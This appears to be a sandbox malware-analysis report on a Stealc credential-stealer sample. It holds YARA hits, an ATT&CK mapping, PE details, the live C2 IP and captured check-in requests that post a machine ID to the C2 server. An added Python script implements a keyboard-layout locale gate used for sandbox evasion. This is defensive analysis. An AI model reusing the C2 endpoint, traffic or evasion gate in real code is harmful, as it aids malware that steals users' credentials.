Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: fProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F75A8 cpuid
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C7D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA
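The GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA, LocalFree chain above is the call-twice pattern for that API (first call returns the count, second fills the buffer) followed by a per-layout locale lookup, which is what the overview's "may stop execution after checking locale" signature refers to. The script below is an added example (mine, not code from the report or the sample) of how such a gate decodes the list: each HKL's low 16 bits are a LANGID and the low 10 bits of that are the primary language, so the gate fires on a machine where a blocked language is merely installed as an extra layout, not selected. The block list is an assumption for illustration; the report shows the API chain, not which languages this sample keys on. The three layout lists at the bottom are constructed.

```python
"""Keyboard-layout / locale gate of the kind the GetKeyboardLayoutList ->
GetLocaleInfoA chain implements.  Added example, not code from the report or
the sample.  The pure functions run anywhere; the two Windows helpers read the
live values through user32/kernel32."""
import sys
from typing import Iterable, List, Tuple

LANGID_MASK = 0xFFFF            # low word of an HKL is the input language
PRIMARY_LANG_MASK = 0x03FF      # low 10 bits of a LANGID (PRIMARYLANGID)
LOCALE_SISO639LANGNAME = 0x59   # GetLocaleInfo: two-letter ISO 639 name

# Primary language IDs from winnt.h; *which* of them to block is assumed.
LANG_RUSSIAN, LANG_UKRAINIAN, LANG_BELARUSIAN, LANG_KAZAK = 0x19, 0x22, 0x23, 0x3F
BLOCKED_PRIMARY = frozenset({LANG_RUSSIAN, LANG_UKRAINIAN, LANG_BELARUSIAN, LANG_KAZAK})


def langid_from_hkl(hkl: int) -> int:
    return hkl & LANGID_MASK


def primary_language(langid: int) -> int:
    return langid & PRIMARY_LANG_MASK


def describe(hkls: Iterable[int]) -> List[Tuple[str, int, int]]:
    """(hkl as hex, langid, primary language) per layout.  The high word of an
    HKL is a layout/IME handle, not a LANGID, and is deliberately ignored."""
    out = []
    for h in hkls:
        langid = langid_from_hkl(h)
        out.append(("%08X" % (h & 0xFFFFFFFF), langid, primary_language(langid)))
    return out


def gate_would_exit(hkls: Iterable[int], blocked=BLOCKED_PRIMARY) -> bool:
    """True if any installed layout's primary language is on the block list."""
    return any(primary_language(langid_from_hkl(h)) in blocked for h in hkls)


def installed_layouts() -> List[int]:
    """Live HKL list on Windows via the count-then-fill calling pattern."""
    if sys.platform != "win32":
        return []
    import ctypes
    user32 = ctypes.windll.user32
    n = user32.GetKeyboardLayoutList(0, None)
    buf = (ctypes.c_void_p * n)()
    user32.GetKeyboardLayoutList(n, buf)
    return [int(h or 0) for h in buf]


def iso639_name(langid: int) -> str:
    """What GetLocaleInfoA(langid, LOCALE_SISO639LANGNAME) returns; Windows only."""
    if sys.platform != "win32":
        return ""
    import ctypes
    buf = ctypes.create_string_buffer(16)
    ctypes.windll.kernel32.GetLocaleInfoA(langid, LOCALE_SISO639LANGNAME, buf, len(buf))
    return buf.value.decode("ascii", "replace")


# Constructed layout lists (typical HKL values, not taken from the report).
US_ONLY = [0x04090409]
US_PLUS_RUSSIAN = [0x04090409, 0x04190419]
US_PLUS_GERMAN_IME_STYLE = [0x04090409, 0xF0C00407]  # high word is a handle

if __name__ == "__main__":
    hkls = installed_layouts() or US_PLUS_RUSSIAN
    for hex_hkl, langid, primary in describe(hkls):
        print(hex_hkl, "langid=0x%04X" % langid, "primary=0x%02X" % primary,
              iso639_name(langid))
    print("gate would exit:", gate_would_exit(hkls))
```

The practical consequence for a sandbox is symmetric: adding a blocked layout to an analysis VM makes a sample with this gate exit cleanly, while a victim box with only a non-blocked default language but a blocked secondary layout is spared.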

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (technique cells grouped by tactic column; a bracketed number is the count badge the report attaches to a technique it matched, copied as extracted; cells without a number are the matrix's unmatched techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter [2]; Native API [12]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [33]; Disable or Modify Tools [11]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [2]; Security Software Discovery [641]; Virtualization/Sandbox Evasion [33]; Process Discovery [13]; Account Discovery [1]; System Owner/User Discovery [1]; File and Directory Discovery [1]; System Information Discovery [334]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [2]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpu | file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206X | file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/e | file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version: 41.0.0 Charoite
                                Analysis ID: 1546463
                                Start date and time: 2024-10-31 23:46:05 +01:00
                                Joe Sandbox product: CloudBasic
                                Overall analysis duration: 0h 3m 0s
                                Hypervisor based Inspection enabled: false
                                Report type: full
                                Cookbook file name: default.jbs
                                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of new started processes analysed: 1
                                Number of new started drivers analysed: 0
                                Number of existing processes analysed: 0
                                Number of existing drivers analysed: 0
                                Number of injected processes analysed: 0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode: default
                                Analysis stop reason: Timeout
                                Sample name: file.exe
                                Detection: MAL
                                Classification: mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 124
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/746f34465cf17784/sqlite3.dll
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | ykDoK8BtxW.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                No context
                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                 | ykDoK8BtxW.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
                                 | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit): 7.960550122218739
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name: file.exe
                                File size: 2'118'656 bytes
                                MD5: 0851a659097fb0251ff585c552f6673d
                                SHA1: b3f95ea7672be4a71e2c5c6b19efd44b26d9d757
                                SHA256: 045bfda1e383466d58bfe5dec775188ff592de16671dc6da7bf9c8fadba3ccba
                                SHA512: eff17b0e24917ac7e54a310882a8e4829989c2c3f3e96ec658c0e20b12ad2ef646ef5fa968e68dc7d35a48589433e5f5aefa7395c9120c664599232d877cd1bb
                                SSDEEP: 49152:3QyjudgC7L7BHg2t1IL2YYsylbyGcmVByYZ/:3Qyadd7HBHeQBFy+VByYZ/
                                TLSH: 0AA533C9DD201626C85E4D71569F5BBAA0BB82902FF8615071059FF78BEFCB011F88A3
                                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash: 90cececece8e8eb0
                                Entrypoint: 0xb23000
                                Entrypoint Section: .taggant
                                Digitally signed: false
                                Imagebase: 0x400000
                                Subsystem: windows gui
                                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major: 5
                                OS Version Minor: 1
                                File Version Major: 5
                                File Version Minor: 1
                                Subsystem Version Major: 5
                                Subsystem Version Minor: 1
                                Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007FE7848FF50Ah
                                rdmsr
                                and byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007FE784901505h
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax+00000000h], eax
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                inc dword ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                 | 0x1000 | 0x2e7000 | 0x67600 | 4e3881e7b069551aa4f74428a49b096a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 | 0x2ea000 | 0x29d000 | 0x200 | af335edf61eb6651a1d3f80ef2f02e7a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                aslwbrhj | 0x587000 | 0x19b000 | 0x19a200 | 3d03c197d5c803721fa8f9641102f247 | False | 0.9949668784288327 | data | 7.95370802823853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                bqvglmea | 0x722000 | 0x1000 | 0x600 | 4c7b22e86c394994767aa123cae6f34b | False | 0.58203125 | data | 4.960012819839788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x723000 | 0x3000 | 0x2200 | bde373344fdacad3aad9aa511860a34b | False | 0.07295496323529412 | DOS executable (COM) | 0.951462676811214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLL | Import
                                kernel32.dll | lstrcpy
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-10-31T23:47:05.311987+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 31, 2024 23:47:04.113292933 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:04.118361950 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Oct 31, 2024 23:47:04.118448973 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:04.118606091 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:04.124362946 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Oct 31, 2024 23:47:05.023514032 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Oct 31, 2024 23:47:05.023600101 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:05.025688887 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:05.031337023 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Oct 31, 2024 23:47:05.311922073 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Oct 31, 2024 23:47:05.311986923 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Oct 31, 2024 23:47:07.836792946 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                • 185.215.113.206
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7116 | C:\Users\user\Desktop\file.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 31, 2024 23:47:04.118606091 CET | 90 | OUT |
                                GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 31, 2024 23:47:05.023514032 CET | 203 | IN |
                                HTTP/1.1 200 OK
                                Date: Thu, 31 Oct 2024 22:47:04 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 31, 2024 23:47:05.025688887 CET | 413 | OUT |
                                POST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a
                                Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                                Oct 31, 2024 23:47:05.311922073 CET | 210 | IN |
                                HTTP/1.1 200 OK
                                Date: Thu, 31 Oct 2024 22:47:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=



                                Target ID: 0
                                Start time: 18:47:00
                                Start date: 31/10/2024
                                Path: C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit): true
                                Commandline: "C:\Users\user\Desktop\file.exe"
                                Imagebase: 0x6b0000
                                File size: 2'118'656 bytes
                                MD5 hash: 0851A659097FB0251FF585C552F6673D
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation: low
                                Has exited: true


                                  Execution Graph

                                  Execution Coverage: 3.2%
                                  Dynamic/Decrypted Code Coverage: 0%
                                  Signature Coverage: 2.9%
                                  Total number of Nodes: 1327
                                  Total number of Limit Nodes: 24
execution_graph
StrCmpCA 37508->37518 37509 6c1acf StrCmpCA 37509->37518 37510 6c1bc0 StrCmpCA 37510->37518 37511 6c1b41 StrCmpCA 37511->37518 37512 6c1ba1 StrCmpCA 37512->37518 37513 6c1b82 StrCmpCA 37513->37518 37514 6c1b63 StrCmpCA 37514->37518 37515 6c1afd StrCmpCA 37515->37518 37516 6c1b1f StrCmpCA 37516->37518 37517 6c1c12 37517->36427 37518->37508 37518->37509 37518->37510 37518->37511 37518->37512 37518->37513 37518->37514 37518->37515 37518->37516 37518->37517 37519 6cab30 lstrlen lstrcpy 37518->37519 37519->37518 37520->36433 37521->36435 37522->36441 37523->36443 37524->36449 37525->36451 37526->36455 37527->36459 37528->36463 37529->36469 37530->36471 37531->36475 37532->36489 37533->36493 37534->36492 37535->36488 37536->36492 37537->36510 37538->36495 37539->36497 37540->36501 37541->36506 37542->36507 37543->36513 37544->36521 37545->36523 37546->36545 37547->36550 37548->36549 37549->36546 37550->36549 37551->36559 37554 6caab0 lstrcpy 37553->37554 37555 6b16c3 37554->37555 37556 6caab0 lstrcpy 37555->37556 37557 6b16d5 37556->37557 37558 6caab0 lstrcpy 37557->37558 37559 6b16e7 37558->37559 37560 6caab0 lstrcpy 37559->37560 37561 6b15a3 37560->37561 37561->37286 37563 6b4816 37562->37563 37564 6b4888 lstrlen 37563->37564 37588 6cade0 37564->37588 37566 6b4898 InternetCrackUrlA 37567 6b48b7 37566->37567 37567->37363 37569 6caa50 lstrcpy 37568->37569 37570 6c8d04 37569->37570 37571 6caa50 lstrcpy 37570->37571 37572 6c8d12 GetSystemTime 37571->37572 37573 6c8d29 37572->37573 37574 6caab0 lstrcpy 37573->37574 37575 6c8d8c 37574->37575 37575->37378 37577 6cac41 37576->37577 37578 6cac98 37577->37578 37580 6cac78 lstrcpy lstrcat 37577->37580 